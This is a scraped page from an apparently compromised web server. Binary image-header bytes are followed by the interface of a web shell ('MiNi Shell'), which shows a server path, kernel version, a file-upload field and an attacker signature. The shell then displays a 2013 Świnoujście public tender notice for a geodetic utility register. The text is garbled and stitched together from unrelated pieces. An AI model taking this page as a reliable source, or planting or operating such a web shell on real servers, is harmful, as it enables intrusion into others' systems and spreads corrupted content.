JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130418/58685-N-2013.html

<p class="kh_header"><b>Świnoujście: Założenie Geodezyjnej Ewidencji Sieci Uzbrojenia Terenu dla części obszaru Miasta Świnoujście</b><br>
<b>Numer ogłoszenia: 58685 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świnoujścia , ul. Wojska Polskiego 1/5, 72-600 Świnoujście, woj. zachodniopomorskie, tel. 091 3212780, 3212309, faks (091) 321 59 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swinoujscie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Założenie Geodezyjnej Ewidencji Sieci Uzbrojenia Terenu dla części obszaru Miasta Świnoujście.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Założenie Geodezyjnej Ewidencji Sieci Uzbrojenia Terenu dla części obszaru Miasta Świnoujście
Zakres objęty obszarowo sekcjami mapy zasadniczej nr:
330.221.0911, 0912, 0913,0914, 0921, 0923,  0924, 0931, 0932, 0933, 0934, 0941, 0942, 0943, 0944, 1033, 1412, 1414, 1421, 1422, 1423, 1424, 1511, 1513, 1514, 1523, 1432, 1441, 1442, 1531, 1532, 1541, 1434, 1443, 1444, 1533, 1534, 1543, 1544, 1912, 1921, 1922, 2011, 2012, 2021, 2022, 1914, 1923, 1924, 2013, 2014, 2023, 2024, 1932, 1941, 1942, 2031, 2032, 2041, 2042, 1934, 1943, 1944, 2033, 2034, 2043, 2044, 2412, 2421, 2422, 2511, 2512, 2521, 2522, 2414, 2423, 2424, 2513, 2514, 2523, 2524, 2432, 2441, 2442, 2531, 2532, 2541, 2542, 2434, 2443, 2444, 2533, 2534, 2543, 2544,  1044, 1542.
330.222. 1133, 1611, 1613, 1631, 1632, 1633, 1634, 2111, 2112, 2113, 2114, 2123, 2131, 2132, 2141, 2133, 2134, 2143, 2121.
330.223.0412, 0421, 0422, 0511, 0512, 0521, 0522, 0414, 0423, 0424, 0513, 0514, 0523, 0524, 0432, 0441, 0442, 0531, 0532, 0541, 0542, 0434, 0443, 0444, 0533, 0534, 0543, 0544, 2042, 0921, 0922, 1011, 1012, 1021, 1022, 0924, 1013, 1014, 1023, 1024, 0942, 1031,1032, 1041, 1042, 1033, 1034, 1043, 1044, 1512, 1521, 1522, 1514, 1523, 1524, 1541, 1542, 1543, 1544, 2021, 2022, 2024.
330.224.0111, 0112, 0113, 0114, 0121, 0122, 0123, 0124, 0131, 0132, 0133, 0134, 0141, 0142, 0143, 0144, 0611, 0612, 0613, 0614, 0621, 0622, 0623, 0624, 0631, 0632, 0633, 0634, 0641, 0642, 0643, 0644, 0733, 1111, 1112, 1113, 1114, 1121, 1122, 1123, 1124, 1211, 1213, 1131, 1132, 1133, 1134, 1141, 1142, 1143, 1144, 1231, 1233, 1611, 1612, 1613, 1614, 1621, 1622, 1623, 1624, 1711, 1713, 1714, 1631, 1632, 1633, 1634, 1641, 2121, 1642, 1643, 1644, 1731, 1732, 2122, 1733, 1734, 1743, 2111, 2112, 2113, 2114, 2123, 2124, 2211, 2212, 2213, 2214, 2221, 2223, 2224, 2132, 2134, 2141, 2142, 2143, 2144, 2231, 2232, 2233, 2234, 2241, 2242, 2243, 2244, 2333.
330.242.0121, 0122, 0123, 0124, 0211, 0212, 0213, 0214, 0221, 0222, 0223, 0224, 0311, 0313, 0231, 0232, 0234, 0241, 0242, 0243, 0244, 0331, 0332, 0333, 0334, 0811, 0812, 0814, 0821, 0823, 0832, 0834, 0841, 0842, 0843, 0844, 1312, 1321, 1322, 1323, 1324, 1411, 1413, 1431, 1432, 1434, 1912.
Etap I - całość prac dla obszaru sekcji mapy zasadniczej nr: 
330.221.0911, 0912, 0913,0914, 0921, 0923,0924, 0931, 0932, 0933, 0934, 0941, 0942, 0943, 0944, 1033, 1412, 1414, 1421, 1422, 1423, 1424, 1511, 1513.
Etap II - całość prac dla obszaru sekcji mapy zasadniczej nr: 
330.221.1514, 1523, 1432, 1441, 1442, 1531, 1532, 1541, 1434, 1443, 1444, 1533, 1534, 1543, 1544, 1912, 1921, 1922, 2011, 2012, 2021, 2022, 1914, 1923, 1924, 2013, 2014, 2023, 2024, 1932, 1941, 1942, 2031, 2032, 2041, 2042, 1934, 1943, 1944, 2033, 2034, 2043, 2044, 2412, 2421, 2422, 2511, 2512, 2521, 2522, 2414, 2423, 2424, 2513, 2514, 2523, 2524, 2432, 2441, 2442, 2531, 2532, 2541, 2542, 2434, 2443, 2444, 2533, 2534, 2543, 2544,  1044, 1542.
330.222. 1133, 1611, 1613, 1631, 1632, 1633, 1634, 2111, 2112, 2113, 2114, 2123, 2131, 2132, 2141, 2133, 2134, 2143, 2121.
330.223.0412, 0421, 0422, 0511, 0512, 0521, 0522, 0414, 0423, 0424, 0513, 0514, 0523, 0524, 0432, 0441, 0442, 0531, 0532, 0541, 0542, 0434, 0443, 0444, 0533, 0534, 0543, 0544, 2042, 0921, 0922, 1011, 1012, 1021, 1022, 0924, 1013, 1014, 1023, 1024, 0942, 1031,1032, 1041, 1042, 1033, 1034, 1043, 1044, 1512, 1521, 1522, 1514, 1523, 1524, 1541, 1542, 1543, 1544, 2021, 2022, 2024.
330.224.0111, 0112, 0113, 0114, 0121, 0122, 0123, 0124, 0131, 0132, 0133, 0134, 0141, 0142, 0143, 0144, 0611, 0612, 0613, 0614, 0621, 0622, 0623, 0624, 0631, 0632, 0633, 0634, 0641, 0642, 0643, 0644, 0733, 1111, 1112, 1113, 1114, 1121, 1122, 1123, 1124, 1211, 1213, 1131, 1132, 1133, 1134, 1141, 1142, 1143, 1144, 1231, 1233, 1611, 1612, 1613, 1614, 1621, 1622, 1623, 1624, 1711, 1713, 1714, 1631, 1632, 1633, 1634, 1641, 2121, 1642, 1643, 1644, 1731, 1732, 2122, 1733, 1734, 1743, 2111, 2112, 2113, 2114, 2123, 2124, 2211, 2212, 2213, 2214, 2221, 2223, 2224, 2132, 2134, 2141, 2142, 2143, 2144, 2231, 2232, 2233, 2234, 2241, 2242, 2243, 2244, 2333.
330.242.0121, 0122, 0123, 0124, 0211, 0212, 0213, 0214, 0221, 0222, 0223, 0224, 0311, 0313, 0231, 0232, 0234, 0241, 0242, 0243, 0244, 0331, 0332, 0333, 0334, 0811, 0812, 0814, 0821, 0823, 0832, 0834, 0841, 0842, 0843, 0844, 1312, 1321, 1322, 1323, 1324, 1411, 1413, 1431, 1432, 1434, 1912..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od wykonawców wniesienia wadium w wysokości 5. 000,00 zł (słownie: pięć tysięcy złotych) przed upływem terminu składania ofert na warunkach określonych w art. 45 i 46 ustawy Prawo zamówień publicznych.
2.Wadium wnoszone w pieniądzu Wykonawca wpłaca: przelewem na rachunek bankowy Urzędu Miasta Świnoujście, nr rachunku: 
27 1240 3914 1111 0010 0965 1187
z dopiskiem: WADIUM W POSTĘPOWANIU NR BGM.272.ZP.3.2013.
3.Datą wniesienia wadium  w pieniądzu przelewem na rachunek jw. jest data uznania wskazanego rachunku.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych oraz spełniający  warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych, dotyczące:
a. posiadania wiedzy i doświadczenia (wymagane jest wykonanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, przynajmniej jednej usługi, polegającej na wykonaniu geodezyjnej ewidencji sieci uzbrojenia terenu, o wartości minimum 150.000 zł.)
b.dysponowania osobami zdolnymi do wykonania zamówienia, gdzie przynajmniej jedna osoba, posiada uprawnienia zawodowe w geodezji i kartografii z zakresu nr 1.
Przez uzbrojenie terenu rozumie się wszelkiego rodzaju nadziemne, naziemne, podziemne przewody i urządzenia wodociągowe, kanalizacyjne, gazowe, cieplne, telekomunikacyjne, elektroenergetyczne i inne oraz budowle podziemne związane z tym uzbrojeniem. 

Opis sposobu dokonywania oceny spełniania tego warunku  
Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona zgodnie z formułą -spełnia/nie spełnia- w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt 9 SIWZ i przedłożonych w ofercie. Z treści dostarczonych dokumentów musi jednoznacznie wynikać, iż wykonawca spełnia warunki udziału w oparciu o dokumenty   stanowiące ofertę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy składający ofertę muszą wykazać się wiedzą i doświadczeniem przez wykazanie, że wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jednej usługi, polegającej na wykonaniu geodezyjnej ewidencji sieci uzbrojenia terenu, o wartości minimum 150.000 zł., wraz z podaniem wartości, daty wykonania i podmiotu, na rzecz którego usługa została wykonana, oraz załączeniem dowodów, czy została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy składający ofertę muszą wykazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument potwierdzający zabezpieczenie oferty akceptowaną formą wadium. 
W przypadku zabezpieczenia określonego w art. 45 ust. 6 pkt 1 ustawy Prawo zamówień publicznych - jest to kopia potwierdzenia przelewu na konto Zamawiającego wskazane w punkcie 12.2.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
Zmiana postanowień umowy jest dopuszczalna zgodnie z art. 144 ustawy Prawo zamówień publicznych wyłącznie w niżej przytoczonym zakresie określonym w § 12 w projekcie umowy stanowiącym załącznik nr 2 do SIWZ:
1.Dopuszcza się następujące możliwości zmiany treści umowy:
a)zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto,
b)zmniejszenie zakresu przedmiotu Zamówienia i stosowne zmniejszenie wynagrodzenia ryczałtowego Wykonawcy, gdy wykonanie zamówienia w pierwotnym zakresie nie leży w interesie publicznym,
c)zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
-działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie, 
-realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, powodującego konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,
-konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.swinoujscie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świnoujście
Biuro Geodety Miasta
ul. Wojska Polskiego 1/3
72-600 Świnoujście
913215414.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 11:00, miejsce: w siedzibie zamawiającego w pokoju nr 102 (Urząd Miasta Świnoujście, ul. 
Wojska Polskiego 1/5, Świnoujście, sekretariat Prezydenta Miasta)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com